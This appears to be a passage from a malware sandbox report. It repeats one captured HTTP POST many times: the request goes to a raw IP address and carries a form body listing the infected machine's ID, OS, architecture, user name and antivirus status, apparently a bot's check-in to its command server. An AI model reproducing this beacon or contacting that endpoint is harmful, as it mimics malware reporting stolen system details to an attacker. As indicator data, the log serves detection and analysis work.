                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 91Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
